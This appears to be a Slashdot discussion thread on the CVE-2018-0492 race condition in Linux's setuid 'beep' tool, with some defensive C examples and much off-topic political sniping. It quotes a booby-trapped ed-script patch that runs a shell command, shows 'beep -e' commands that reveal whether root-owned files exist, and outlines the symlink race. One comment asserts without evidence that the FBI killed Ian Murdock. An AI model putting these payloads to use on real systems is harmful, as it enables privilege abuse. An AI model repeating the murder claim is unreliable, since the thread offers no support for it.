Slashdot Mirror


Linux: Beep Command Can Be Used to Probe for the Presence of Sensitive Files (bleepingcomputer.com)

Catalin Cimpanu, writing for BleepingComputer: A vulnerability in the "beep" package that comes pre-installed with Debian and Ubuntu distros allows an attacker to probe for the presence of files on a computer, even those owned by root users, which are supposed to be secret and inaccessible. The vulnerability, tracked as CVE-2018-0492, has been fixed in recent versions of Debian and Ubuntu (Debian-based OS). At its core, the bug is a race condition in the beep utility that allows the OS to emit a "beep" sound whenever it is deemed necessary. Security researchers have discovered a race condition in the beep package that allows an attacker to elevate his code to root-level access.

109 comments

  1. bleep by Chaldean42 · · Score: 5, Funny

    Anyone else find it ironic that this comes from bleepingcomputer.com?

    1. Re:bleep by Anonymous Coward · · Score: 0

      No. Not if you consider the actual definition of ironic, instead of that Canadian chick's false definition.

    2. Re:bleep by fluffernutter · · Score: 1

      From your comment I expected to see a link to a definition that differed from Alanis Morissette's but it is the same; leaving me very confused.

      --
      Laws are rules for the court, but merely a bottom bar to hit for life. Think beyond laws in your actions always.
    3. Re: bleep by aliquis · · Score: 1

      The second one there seems to fit ...

    4. Re:bleep by Anonymous Coward · · Score: 0
    5. Re:bleep by Anonymous Coward · · Score: 0, Insightful

      If Hillary had committed any crimes, dontchathink that the Republican lead Congress would have found her guilty of something and actually done something about it?

      Is someone a criminal really because a bunch of crazies keep making shit up about them?

    6. Re: bleep by Anonymous Coward · · Score: 0

      Look at definition 3 in your own link.

    7. Re:bleep by Anonymous Coward · · Score: 0

      If Hillary had committed any crimes, dontchathink that the Republican lead Congress would have found her guilty of something and actually done something about it?

      Is someone a criminal really because a bunch of crazies keep making shit up about them?

      [M]aking shit up?!?!?!

      What color is the sky on your planet?

      <HILLARY>There is no email server</HILLARY>

      Cash Flowed to Clinton Foundation Amid Russian Uranium Deal - The New York Times

    8. Re:bleep by Archangel+Michael · · Score: 0

      Dude, Hillary lost.

      Not according to Hillary and the left, who keep reminding those of us who didn't vote for her that she "won the popular vote", as if that is some sort of consolation prize.

      --
      Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
    9. Re:bleep by Anonymous Coward · · Score: 0

      The popular vote is the popular vote = more people voted for HRC than Donald J Prison. Face it however you can. Trump for his part can't admit that fact, goes so far as to lie about photographs on the topic.
      Isn't it sad when a Billionaire con man goes to prison because he couldn't stop lying? That's Republicanism today I guess - eventually the truth sets them free, but life in prison is such a looooooong time...

      Treason doesn't pay. Learn that lesson, you've got plenty of time. You may get there eventually. (Also, I voted for Bernie knowing he would lose, he's the trustworthy one of the three.)

    10. Re:bleep by Anonymous Coward · · Score: 0

      Congress makes laws, they don't enforce them, nor do they investigate them -- that would be the judicial branch, and the FBI both of which are overwhelmingly not republican.

    11. Re:bleep by null+etc. · · Score: 0

      This is the age of unsubstantiated bullshit. Indirect accusations are now more powerful than fact.

    12. Re:bleep by Anonymous Coward · · Score: 0

      The long answer to your question is at the bottom of the page at this link. https://linux.die.net/man/1/beep

      TL;DR answer: A non-root remote user cannot use beep, and an xterm or other x-session is considered to be "remote".

    13. Re:bleep by Obfuscant · · Score: 0

      as if that is some sort of actual thing

      FTFY. There ain't no "popular vote" for President in the US.

    14. Re:bleep by Anonymous Coward · · Score: 0

      I consider it ironic that the Presiding officer of the United States is about to become the most carefully guarded criminal in that nation's storied history...

      yet again a guilty American voter feels the need to dilute a discussion about something to pander to his/her bad conscience.

    15. Re:bleep by bugs2squash · · Score: 0

      I'd be interested to see what facts you have to back those statements up, especially the one about the FBI.

      --
      Nullius in verba
    16. Re: bleep by Brockmire · · Score: 0

      You just proved his point. Find the John Oliver take down on why your Russian/Uranium deal proves you're a tinfoil fucknut. It wasn't even up to her. How the fuck can Putin both loathe Hillary and love her at the same time? Jesus fucking Christ you're fucking dumb. It's well known he hates her. Get some better conspiracies that don't immediately fall apart.

    17. Re: bleep by Brockmire · · Score: 0

      Google search disagrees.

    18. Re: bleep by Brockmire · · Score: 0

      I see you're getting on the Trump train if you think changing facts makes any sense. Not repeating it doesn't make it untrue.

    19. Re:bleep by Archangel+Michael · · Score: 1

      Treason doesn't pay.

      Unless you're Hillary. The whole Clinton Foundation thing while SoS was a criminal endeavor pay to play, legalized bribery. Funny how the Clinton Foundation donations have all but disappeared now that she and Bill have no chance at power.

      And no, I didn't vote for Donald. It is amazing how people are still excusing their candidate because someone else won. Two Criminals, by Two Criminal Organization called political parties. Pretending it would be better under "Not Trump" Hillary is why the country is going to shit.

      And Bernie isn't trustworthy, he and his wife are under criminal investigation for fraud. But he's a good socialist so lets ignore that.

      --
      Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
    20. Re: bleep by Anonymous Coward · · Score: 0

      Congress writes laws. It does not enforce them. Search for "Schoolhouse Rock" on YouTube for higher education on civics too advanced for most public high schools.

    21. Re: bleep by Anonymous Coward · · Score: 0

      The USA has never elected Presidents on the basis of the popular vote. If we did, then Abe Lincoln never would have been President and blacks might still today be the slaves of wealthy Democrats.

    22. Re:bleep by JustNiz · · Score: 1

      >> Republican lead Congress

      Like this you mean? :https://www.politico.com/story/2017/11/13/sessions-special-counsel-clinton-uranium-244867

    23. Re: bleep by JustNiz · · Score: 1

      By your standards, the Attorney general must be a tinfoil fucknut too then.
      https://www.politico.com/story...

      > Jesus fucking Christ you're fucking dumb. It's well known he hates her.
      It's also well-known that he hates Trump and in fact anything American, but you Liberal morons just can't handle that because the truth undermines your whole rabid conspiracy rant.

    24. Re:bleep by JustNiz · · Score: 1

      It is perfectly well documented that Hillary has in fact broken the law and has thus far at least, gotten away scot-free with it.

      If someone simply pointing out facts equates in your mind to that person having personal failings and insecurities, then it's 100% clear that you only need to look in the mirror to see where the real and significant mental issues actually lie.

  2. beep boop root by Anonymous Coward · · Score: 1

    Urg... this'll get some flack from the Windows fanboys.

    "Linux can be rooted by a command that makes your computer beep? That's fucking idiotic, man..."

    1. Re:beep boop root by Sarten-X · · Score: 2

      Right? About the only thing worse would be a kernel vulnerability in something silly like fonts...

      The beep vulnerability makes a lot of sense, actually. Related to this update, I recently learned that the ubiquitous beep used to be driven by reprogramming the system clock. Naturally, that kind of hardware access is something that should be a system administrator function, restricted to root on *nix systems. It would make sense, then, that any vulnerability there would likely be a privilege escalation.

      --
      You do not have a moral or legal right to do absolutely anything you want.
    2. Re:beep boop root by TheRaven64 · · Score: 3, Informative

      Right? About the only thing worse would be a kernel vulnerability in something silly like fonts

      Windows and Linux have both had font handling vulnerabilities. The difference is that in Windows they were in the kernel, whereas in Linux they were in X11, which ran with root privilege and could open /dev/kmem and directly modify kernel memory.

      The beep vulnerability makes a lot of sense, actually.

      No it doesn't. All *NIX operating systems provide standard UNIX file permissions on device nodes and accessing /dev/dsp or the device for the internal speaker to a group is trivial. Most modern *NIX systems provide ACLs, so you can provide finer-grained access. Most modern *NIX systems even provide access control frameworks that let you grant access on a {program, file} pair, rather than, a {user, file} pair, so you could grant access to the device to the beep program running at any user, but not grant any other rights to the program or the user. These vulnerabilities are in no way intrinsic to the beep program, they are related to how the beep program is installed.

      --
      I am TheRaven on Soylent News
    3. Re:beep boop root by tlhIngan · · Score: 1

      Right? About the only thing worse would be a kernel vulnerability in something silly like fonts...

      The beep vulnerability makes a lot of sense, actually. Related to this update, I recently learned that the ubiquitous beep used to be driven by reprogramming the system clock. Naturally, that kind of hardware access is something that should be a system administrator function, restricted to root on *nix systems. It would make sense, then, that any vulnerability there would likely be a privilege escalation.

      Font handling is not easy, especially in modern days. It might seem easy (after all, TeX works by pushing around fixed-sized boxes, but that doesn't work in a modern i18n world). Take for example, letter decorations. Beyond the Euro languages which generally just have accents and such, some languages have a lot more they can put on letters. And then the order of the decorations can be important as well as where the character appears in the string (e.g., Arabic is bad for this - add a character and the "word" can enlarge in size, shrink in size, etc. It's one of the ways iOS was compromised - if you attempt to replace a long word with a split one (e.g., instead of showing "This is a really long message to fit on the message box of the screen", it will want to cut it and show "This is a really long message..." or "This is a really long mess..."), the string can actually take more space to display than if you added more characters.

      Rendering fonts is no longer easy - some languages seem poised to make it especially difficult because the shape you use depends on so many variables (decorations, preceding words, location of character in the word, etc) so it is no surprise that there are vulnerabilities. Depending on where your font rendering code is, this could be a serious one or a minor one.

      As for the beep package, on the PC, the system speaker is connected to the timer chip. In order to control the pitch and duration you have to reprogram the timer chip (which can be the main timer chip as well) in order to cause it to make noise (you have to have access to a couple other registers as well - there's an enable line and an "amplifier" enable line used to connect the timer output to the speaker itself).

      This inflexibility of the PC speaker is what makes PCM output using the speaker impressive.

    4. Re:beep boop root by Sarten-X · · Score: 1

      Both points there are exactly what I was alluding to... Modern computing is a lot more complicated than it seems. It's amazing how much of technology is hacked together with duct tape and baling wire to make it work, and it's silly for anyone to throw stones in a city full of glass houses.

      --
      You do not have a moral or legal right to do absolutely anything you want.
    5. Re:beep boop root by Anonymous Coward · · Score: 0

      I don't use duct tape to keep things stuck together. I jerk off into my hand and spread it as an adhesive.

  3. Article ist not correct by messju · · Score: 4, Informative

    Beep is not pre-installed on Debian GNU/Linux.

    1. Re:Article ist not correct by andrewbaldwin · · Score: 2

      It's not pre-installed on Mint either

    2. Re:Article ist not correct by sjwest · · Score: 2

      It's not installed by default on Debian

      beep does what you'd expect: it beeps. But unlike printf "\a" beep allows
      you to control pitch, duration, and repetitions. Its job is to live inside
      shell/perl scripts and allow more granularity than one has otherwise. It is
      controlled completely through command

      I suppose somebody needs that, not us.

    3. Re:Article ist not correct by Anonymous Coward · · Score: 0

      If you have never written a script to generate music using beep you don't belong on slashdot.

    4. Re:Article ist not correct by FormOfActionBanana · · Score: 1

      When I was young the programs were play and rec.

      --
      Take off every 'sig' !!
    5. Re:Article ist not correct by FormOfActionBanana · · Score: 0

      Or fucking echo Ctrl-V Ctrl-A

      --
      Take off every 'sig' !!
    6. Re:Article ist not correct by Scarletdown · · Score: 1

      So only those who have ever used computers just to generate music are supposed to be on Slashdot? You might want to go back to eating Tide Pods and snorting condoms back in your basement, kid.

      --
      This space unintentionally left blank.
    7. Re:Article ist not correct by Chris+Mattern · · Score: 1

      Nor on Ubuntu. I can't imagine anybody going out and just getting this package. Is there anything that gets it as a pre-req?

    8. Re:Article ist not correct by Carewolf · · Score: 2

      If you have never written a script to generate music using beep you don't belong on slashdot.

      Coding music with beep is like programming BASIC, real men echo to /dev/dsp.

    9. Re:Article ist not correct by tomxor · · Score: 1

      Yup, I just tried it.

    10. Re:Article ist not correct by KiloByte · · Score: 1

      real men echo to /dev/dsp

      Except for those who noticed that /dev/dsp was deprecated five ages and two aeons ago, and today its emulation is not even functional anymore.

      --
      The creatures outside looked from Alt-Right to Antifa; but already it was impossible to say which was which.
    11. Re:Article ist not correct by Anonymous Coward · · Score: 0

      And in most systems the beep command needs extra privileges to run:


      ac@slashdot ~ $ beep
      ioctl: Operation not permitted

    12. Re:Article ist not correct by Anonymous Coward · · Score: 0

      Or fucking echo Ctrl-V Ctrl-A

      -bash: fucking: command not found

    13. Re: Article ist not correct by Anonymous Coward · · Score: 0

      alias fucking sudo

    14. Re:Article ist not correct by Carewolf · · Score: 1

      real men echo to /dev/dsp

      Except for those who noticed that /dev/dsp was deprecated five ages and two aeons ago, and today its emulation is not even functional anymore.

      You could say the same about beep, deprecated and now only works through emulation.. Emulation so complex it has security holes.

    15. Re:Article ist not correct by KiloByte · · Score: 1

      That's not emulation of beeps: you can do that unprivileged as long as you can play regular sound: here's a function named sin, output its results as 16-bit integers and there you go. That beep tool uses real PC honker, needing root to access it without being at console.

      --
      The creatures outside looked from Alt-Right to Antifa; but already it was impossible to say which was which.
  4. setuid strikes again by Anonymous Coward · · Score: 0

    *sigh* Either remove the damn thing from your program and require sudo privs, or redesign the thing so it doesn't need root (if possible).

    1. Re:setuid strikes again by Anonymous Coward · · Score: 0

      *sigh* Either remove the damn thing from your program and require sudo privs, or redesign the thing so it doesn't need root (if possible).

      What the flying fuck do you need to be setuid in order to make a beep sound?

      Did beep catch the systemd disease?

    2. Re:setuid strikes again by Anonymous Coward · · Score: 0

      Please don't give Poettering any more ideas, beepd does not need to happen.

    3. Re: setuid strikes again by guruevi · · Score: 1

      Beeping on IBM clones is done by playing with the PIC chip which was quite literally connected to a pin on the processor. It requires rather low level access to program. You could obviously write a shim in modern kernels to user space but there are a lot of things that have direct access to hardware.

      --
      Custom electronics and digital signage for your business: www.evcircuits.com
    4. Re:setuid strikes again by Anonymous Coward · · Score: 0

      The program needs to open the system console, that is /dev/tty0 to be able to use the ioctl required to send the beep, assuming you're not on the local console. The flaw in the program is that it allows you to specify a path for the console, which allows you to see if a file exists(like say in /root or whatever). Basically the program tries to open specified file and then reports failure if the file doesn't exist. If the file does exist, the ioctl() will error out.

      $ /usr/local/bin/beep -e /root/.bashrc
      ioctl: Inappropriate ioctl for device
      ioctl: Inappropriate ioctl for device
      $ /usr/local/bin/beep -e /root/failboat
      Could not open /root/failboat for writing
      open: No such file or directory
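
One way to close the existence oracle described in the comment above, as an added example (not code from beep or from the poster): open the caller-supplied path with the caller's own identity, accept only character devices, and report one generic failure. The function name `open_console_as_caller` and the message text are assumptions made for this sketch.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Open a user-supplied console path from inside a setuid program.
 * Returns a file descriptor on success and -1 on any failure.
 *
 * The open() runs with the effective uid switched to the real uid, so the
 * kernel applies the caller's own permissions: a path under /root fails
 * with the same result whether or not the file exists, because directory
 * search permission is denied before existence is ever tested.
 * (A setgid program would need the same treatment for the effective gid.)
 */
int open_console_as_caller(const char *path)
{
    uid_t privileged = geteuid();   /* root when installed setuid root */
    uid_t caller = getuid();        /* the user who ran the program    */
    struct stat st;
    int fd;

    if (seteuid(caller) != 0)
        return -1;

    /* O_NONBLOCK: do not hang on FIFOs or modem lines; O_NOCTTY: never
     * acquire the opened device as a controlling terminal. */
    fd = open(path, O_WRONLY | O_NOCTTY | O_NONBLOCK | O_CLOEXEC);

    /* Privileges must come back before anything else happens; if that
     * fails the process state is unknown, so stop. */
    if (seteuid(privileged) != 0)
        abort();

    if (fd < 0)
        return -1;

    /* Only a character device can accept the console ioctl. Rejecting
     * everything else here means a regular file never reaches ioctl(),
     * so there is no second, distinguishable error message. */
    if (fstat(fd, &st) != 0 || !S_ISCHR(st.st_mode)) {
        close(fd);
        return -1;
    }
    return fd;
}

int main(int argc, char **argv)
{
    const char *path = (argc > 1) ? argv[1] : "/dev/tty0";
    int fd = open_console_as_caller(path);

    if (fd < 0) {
        /* One message for every failure: missing file, wrong type and
         * permission denied all look the same to the caller. */
        fprintf(stderr, "cannot use the given path as a console device\n");
        return 1;
    }
    close(fd);
    return 0;
}
```
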

  5. Unfortunate by Anonymous Coward · · Score: 0

    Most of her examples tend more toward "unfortunate" than "ironic" but that was too many syllables to flow well in a song.

    1. Re:Unfortunate by fluffernutter · · Score: 1

      She's talking about ironic coincidences.. which both definitions mention.

      --
      Laws are rules for the court, but merely a bottom bar to hit for life. Think beyond laws in your actions always.
  6. Issue was resolved by renaming it to sonar. by Anonymous Coward · · Score: 0

    Nothing to see, move along

  7. So by Greyfox · · Score: 2

    Another setuid vulnerability in this day and age? You'd think it was difficult to find all the setuid programs on a system and audit the shit out of each and every one of them.

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

  8. Socratic irony, dramatic irony, and... by Anonymous Coward · · Score: 0

    "The third, and debated, use of irony regards what’s called situational irony. Situational irony involves a striking reversal of what is expected or intended: a person sidesteps a pothole to avoid injury and in doing so steps into another pothole and injures themselves. Critics claim the word irony and ironic as they are generally used (as in, 'Isn’t it ironic that you called just as I was planning to call you?') can only apply to situational irony, and uses like the one above are more properly called coincidence."

    So there's still some debate on the topic.

  9. Forget this comes from Bleeping Computer by cloud.pt · · Score: 1

    The real pun to this vulnerability is the fact it is a race condition in the "beep" package.

    Beep! Beep!

  10. I find it ironic... by frank_adrian314159 · · Score: 4, Insightful

    ... that a command that probably started life as putchar('\007'); could morph into some monster needing to spawn threads and have race conditions.

    --
    That is all.
    1. Re:I find it ironic... by Anonymous Coward · · Score: 0

      ... that a command that probably started life as putchar('\007'); could morph into some monster needing to spawn threads and have race conditions.

      If you've heard about this small argument over this systemd thing, you may want to hold off; there are lethal doses of irony there.

    2. Re:I find it ironic... by Anonymous Coward · · Score: 5, Informative

      Your comment tells me that you probably don't understand the "putchar('\007')" reference.

      The "bell" command is so primitive that it's a BIOS function. There's no code to write. It's already in there. Even from the DOS 1.0 command line you can type "echo ^G" and it works. (That's the control key plus the letter G, for the younger kids in the crowd)

      It should be so simple that regardless of how many layers of code you pile on top, security issues of ANY form should be impossible, But, alas, code bloat and overly complex implementations have brought us to this place. You can't even trust a beep.

    3. Re:I find it ironic... by edtice1559 · · Score: 2

      The command is a bit more complicated than that. It allows you to specify the tone and duration. And the race condition comes because (a) multiple processes can call it simultaneously and (b) there is signal handling code present so that the speaker isn't left beeping in perpetuity should the process somehow get killed in the middle of a beep! If you look at the proposed patch, things make a bit more sense. And the FAQ is hysterical https://holeybeep.ninja/

    4. Re:I find it ironic... by Anonymous Coward · · Score: 0

      Except linux or Windows NT etc. don't use the BIOS?

      In Windows, echo ^G plays a .wav file. If sound playback isn't available you can get to hear that DOS 1.0 beep.
      So in older versions of Windows, in fail-safe mode you could hear 1980s beeps when using notepad I think (using move keys when the cursor stuck at end or beginning of file). Fairly weird when you didn't expect it and hadn't used the PC speaker in a decade.

      Perhaps the default .wav files are system protected files these days, but I don't know.
      It was discovered that on North Korean linux, there is a system protected .wav file (either edits to the file are reversed, or the computer refuses to work when such files have been tampered with). It's the somewhat famous "screaming pig" stolen from an antivirus program and it's played when there is a "security" issue.

    5. Re:I find it ironic... by Anonymous Coward · · Score: 0

      Hmm, same AC.
      This being Unix, maybe it was the terminal or terminal emulator's job to handle this.
      If your terminal or system console was an automated mechanical typewriter, the terminal was just rigged to ring a physical bell when receiving that \007 character?
      No BIOS function to write then.
      Just don't ring the wrong bells, if there are several terminals attached.

    6. Re:I find it ironic... by Anonymous Coward · · Score: 1

      The "bell" command is so primitive that it's a BIOS function. There's no code to write. It's already in there. Even from the DOS 1.0 command line you can type "echo ^G" and it works.

      Actually it is much older than that. The BEL code was in teletype Murray code from 1901, some 80 years before MS-DOS. It requested that the teletype machine rang a bell to alert the operator.

      See http://en.wikipedia.org/wiki/Baudot_code

    7. Re:I find it ironic... by Anonymous Coward · · Score: 0

      Your comment tells me that you probably don't understand that "putchar('\007')" doesn't permit changing pitch. For that you have to go to IO port 0x61, y'know "OUT 061H, AL" in 8086 assembler, none of this high-level BIOS stuff.

    8. Re:I find it ironic... by Anonymous Coward · · Score: 0

      I am not going to ask how you know this :P

    9. Re:I find it ironic... by slashdice · · Score: 1

      ___________
      | oo  .ooo|
      | oo  .o o|
      | ooo .o  |
      |  o  .   |
      | oo o.ooo|
      | oo  .oo |
      | oo  .oo |
      |  o  .   |
      | oo o.o o|
      | oooo.  o|
      |  o  .   |
      | oo o.o  |
      | oo  .  o|
      | ooo .ooo|
      | oo o.oo |
      |  o o.oo |
      |    o. o |
      ___________

      --
      Copyright (c) 1990 - 2014 Dice. All rights reserved. Use of this comment is subject to certain Terms and Conditions.
    10. Re:I find it ironic... by Anonymous Coward · · Score: 0

      Some versions of Windows had a Beep() API function. On others, you had to write some assembly language to call the BIOS function. Yes, you could let the command prompt / DOS interpret the bell character, but if you wanted to specify the tone, you had to do more work.

      Source: I wrote a DLL that would programmatically call ASM or Beep(), hooked it up to a parser that would interpret a custom music notation, and made it play Chopin.

      Captcha: misuse

    11. Re:I find it ironic... by Anonymous Coward · · Score: 0

      "yeah, the speaker cone just moves by itself when that value is in the stream, you don't need to write any code to make it happen"

      Your ignorance, coupled with your arrogance, is stunning. '\007' is the same '\a', which stands for "alarm", and is the ASCII control code BEL. This function goes back to the days of teletypes. The code is in the terminal itself, or later in terminal emulators.

    12. Re:I find it ironic... by Anonymous Coward · · Score: 0

      It's common knowledge.

    13. Re:I find it ironic... by AmiMoJo · · Score: 1

      Most modern computers don't even have a BIOS any more. In fact most don't even have a beeper.

      Some people were using beep to create delays in scripts. The mind boggles.

      --
      const int one = 65536; (Silvermoon, Texture.cs)
      SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
  11. Debian Beeping by bill_mcgonigle · · Score: 1

    The one thing that's been driving me nuts since switching to Debian testing (from Fedora) is X using system beeps to alert, even though Pulse is running. I'll have to see if something dragged in 'beep' as a dependency when I get home.

    --
    My God, it's Full of Source!
    OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
    1. Re:Debian Beeping by Anonymous Coward · · Score: 1

      rmmod pcspkr

  12. FFS by Anonymous Coward · · Score: 1

    Is this really where we are now? How many decades of computer science and security research and there's a vulnerability in beep?

    Pack it up. We're done. Computers were good while they lasted, but maybe our pending cockroach overlords will get this whole computer thing straightened out better than we did.

  13. Missing information by nospam007 · · Score: 1

    So, when the attacker does this, does it now beep or not?

    1. Re:Missing information by Anonymous Coward · · Score: 3, Funny

      no they would use beep --silent

    2. Re:Missing information by Anonymous Coward · · Score: 0

      Beep really beeps silently by default, in fact. May be a debian/ubuntu thing. When you install it and try to use it it doesn't work because some kernel module isn't loaded. After you load the kernel module with the right name that allows to use the PC speaker, it will work if you're lucky. And maybe your PC doesn't have a PC speaker at all.

    3. Re:Missing information by Anonymous Coward · · Score: 0

      Who the bleep added.....Aweo534ir[asf zs;>>># whoami root #_

  14. If it comes pre-installed, that's a recent change by Anonymous Coward · · Score: 0

    None of my Ubuntu systems have beep installed and I know I didn't remove it on purpose.

  15. Kids by Anonymous Coward · · Score: 0

    Kids nowadays couldn't even code a helloworld.c without an error.

    1. Re:Kids by slashdice · · Score: 1

      Kids these days code a helloworld.c using node.js and electron. And yes, it has a cross-domain vulnerability, and 7 copies of Never Gonna Give you Up (apparently, included with is-thirteen.js)

      --
      Copyright (c) 1990 - 2014 Dice. All rights reserved. Use of this comment is subject to certain Terms and Conditions.
  16. And rooted from the patch, too by DrYak · · Score: 4, Informative

    "Linux can be rooted by a command that makes your computer beep? That's fucking idiotic, man..."

    And the patch that supposedly fixes the bug contains this gem :

    --- /dev/null 2018-13-37 13:37:37.000000000 +0100
    +++ b/beep.c 2018-13-37 13:38:38.000000000 +0100
    1337a
    1,112d
    !id>~/pwn.lol;beep # 13-21 12:53:21.000000000 +0100
    .
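
    Review bot: the line `!id>~/pwn.lol;beep` that follows the ed commands `1337a` and `1,112d` is a shell command in ed-script syntax, not C source for beep.c, so this diff should be rejected rather than passed to patch. The header timestamps (`2018-13-37`) are not valid dates either, which is a second sign the file is not a genuine diff of beep.c. Ask for the fix as a unified diff with ordinary `@@` hunks and read every line of it before applying.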

    Which is supposed to be an exploit of patch:
    according to that source, patch supports diff written in ed scripts (you know, the one editor that is supposed to be the punch line of every "VI vs EMACS" flamewar)
    and ed in turn has "! command" to execute commands.

    So yes, even the patch fixing the "beep" exploit can be exploited in turn and root the system too (... of any admin careless enough to run the build of the patched package on the bare system instead of inside some container and as a non-root user).

    ---

    Back to beep itself :
    - https://sigint.sh/#/holeybeep - a good source which analyzes how beep is exploitable (basically signal handler called at the exact wrong time, while performing a switcharoo on symlink target, between the console that gets opened on each beep, and the target file that gets opened when the signal kills the audio)
    - https://github.com/johnath/bee... upstream audio.

    --
    "Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
    1. Re:And rooted from the patch, too by Anonymous Coward · · Score: 0

      What I found amazing was how easy this bug was to spot. The procedure do_beep needs console_type to be set appropriately for the device (file) console_fd to work correctly. There is no code to set these two together in an atomic fashion, yet the signal handler just goes ahead and calls do_beep. I don't know much about Linux programming, let alone signal handlers, but even though I didn't immediately see the possibility of an exploit, when I saw the signal handler, I knew instantly a bug was hiding in there.
      My best guess to what caused this situation is that beep was considered to be a bit of a hacky bash tool thingy and never given a thorough source review because of that. And before it was setuid'ed there might not have been a point; there's hardly a serious use case for this toy so who cares if it's a bit buggy, right? But then it was setuid'ed without being given the thorough code review any security critical application deserves. I don't know who made that decision, but I'm glad it wasn't yours truly.
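
The non-atomic update that the comment above describes, modelled in C next to a hardened variant, as an added example (not code from beep or from the poster). The struct, the `KIND_*` names, the fake descriptor numbers and `run_beeps` are assumptions; no real console or speaker is touched, and `raise()` stands in for a signal that lands between the two stores.

```c
/* Added example: simulated devices only. */
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>

enum console_kind { KIND_NONE, KIND_TTY, KIND_EVDEV };   /* hypothetical names */
struct console { int fd; enum console_kind kind; };

static struct console current = { -1, KIND_NONE };
static volatile sig_atomic_t stop_requested;
static int silence_mismatches;

/* Constructed model: even fake fds are ttys, odd fake fds are event devices. */
static enum console_kind real_kind_of(int fd)
{
    if (fd < 0) return KIND_NONE;
    return (fd % 2 == 0) ? KIND_TTY : KIND_EVDEV;
}

/* Stand-in for "mute the speaker": counts calls that see a mismatched pair,
 * i.e. a descriptor about to be driven with the wrong device protocol. */
static void silence(const struct console *c)
{
    if (c->kind != real_kind_of(c->fd)) silence_mismatches++;
}

/* Pattern from the comment: the handler acts on the shared pair directly. */
static void unsafe_handler(int signo) { (void)signo; silence(&current); }

/* Hardened pattern: the handler only records that a signal arrived. */
static void safe_handler(int signo) { (void)signo; stop_requested = 1; }

/* Point `current` at a new fake device. In hardened mode SIGINT is blocked
 * while fd and kind are stored, so the pair changes as one unit. */
static void switch_console(int fd, int hardened, int signal_mid_update)
{
    sigset_t block, old;
    sigemptyset(&block);
    sigaddset(&block, SIGINT);
    if (hardened) sigprocmask(SIG_BLOCK, &block, &old);
    current.fd = fd;
    if (signal_mid_update) raise(SIGINT);        /* worst-case arrival time */
    current.kind = real_kind_of(fd);
    if (hardened) sigprocmask(SIG_SETMASK, &old, NULL);  /* pending SIGINT is delivered here */
}

/* Play `count` simulated beeps on fake fds 10, 11, 12, ... with SIGINT
 * arriving mid-switch for beep number `interrupt_at` (-1 for never).
 * Returns how many silence() calls saw an inconsistent fd/kind pair. */
int run_beeps(int count, int interrupt_at, int hardened)
{
    struct sigaction sa = {0};
    sigset_t unblock;

    sa.sa_handler = hardened ? safe_handler : unsafe_handler;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGINT, &sa, NULL);
    sigemptyset(&unblock);
    sigaddset(&unblock, SIGINT);
    sigprocmask(SIG_UNBLOCK, &unblock, NULL);    /* start from a known mask */

    current.fd = -1;
    current.kind = KIND_NONE;
    stop_requested = 0;
    silence_mismatches = 0;

    for (int i = 0; i < count; i++) {
        switch_console(10 + i, hardened, i == interrupt_at);
        if (stop_requested) {        /* cleanup runs in normal context */
            silence(&current);
            break;
        }
        /* the tone would be played here */
        silence(&current);           /* normal end of one beep */
    }
    signal(SIGINT, SIG_DFL);
    return silence_mismatches;
}

int main(void)
{
    printf("unsafe handler:   %d mismatched silence call(s)\n", run_beeps(3, 1, 0));
    printf("hardened handler: %d mismatched silence call(s)\n", run_beeps(3, 1, 1));
    return 0;
}
```
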

  17. Fonts on UNIX by DrYak · · Score: 5, Informative

    The difference is that in Windows they were in the kernel, whereas in Linux they were in X11, which ran with root privilege and could open /dev/kmem and directly modify kernel memory.

    Maybe a couple of decades ago.

    Since then:
    - in some distant past, font rendering on Unix was offloaded to a separate X Font Server that communicates over a socket, and didn't need itself to be root to write to the framebuffer.
    - in a more recent past , font rendering was moved out of the X server, and into the client.

    No it doesn't. All *NIX operating systems provide standard UNIX file permissions on device nodes and accessing /dev/dsp or the device for the internal speaker to a group is trivial.

    In this case, that's the console/VT or event device (basically beep is good old "\a" bell, but on steroids, i.e.: with ioctl/writes to precisely tune the beep).
    It doesn't use any audio device (no /dev/dsp).

    That's indeed stupid as there are methods to give access of those to the currently logged-in user (If I'm not mistaken, basically the same work that has been done to run X11 on any non-dinosaur distros)

    That's exactly what is abused by some exploits (source) :
    have a symlink point to an event device (the kind that is controlled by writing instead of ioctl), start a "beep" command (which will open the symlink for writing as root on each played sound), then at the perfect time reroute the symlink, send a kill signal - the signal handler will try to mute the speaker (by again opening the symlink for writing), but is now writing the parameters in the target file instead of the event device.

    --
    "Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
  18. Safe. Secure. Open Source. by Anonymous Coward · · Score: 0

    Lol

  19. Oh, nice by ChoGGi · · Score: 1

    Now you can beep your way to success.

  20. bleeping FBI killed bleeping Ian Murdoch. by Anonymous Coward · · Score: 0

    Just know that Debian is hosed. Ian didn't kill himself he had no reason to. Ask anybody who knew him. He loved his work. Love doesn't make you kill yourself especially if it's your work.

    FBI killed Ian because he wouldn't give them beeps into QNAP NAS's etc. Too much snoobability that he wouldn't help circumvent.

    Isn't that right slashdot.gov ? Man who are you even trying to bullshit? Everybody is stupid?

    1. Re:bleeping FBI killed bleeping Ian Murdoch. by Anonymous Coward · · Score: 0

      Ian didn't kill himself he had no reason to. Ask anybody who knew him. He loved his work. Love doesn't make you kill yourself especially if it's your work.

      You clearly do not understand what it's like to be suicidal or have ever been so. A lot of people are really good at keeping up a facade that everything is okay and that they are happy and love their work. What you don't see is the turmoil that goes on in their head, what demons they carry and so on. How do I know? Been there, damn near was successful. I tried a massive overdose of benzodiazepines, opioids, paracetamol and pretty much anything else I could find in the house. Absolutely zero people were aware that I was having major mental health issues at the time. Had a great job, loved my work, really had everything going for me, didn't matter.

      I understand that it's easier for people to try to rationalize that there is no way that someone would commit suicide. Suicidal thoughts aren't rational by their nature.

  21. If only they had used Rust! by gerald.edward.butler · · Score: 0

    Let the games begin!

  22. bigger security hole by Anonymous Coward · · Score: 0

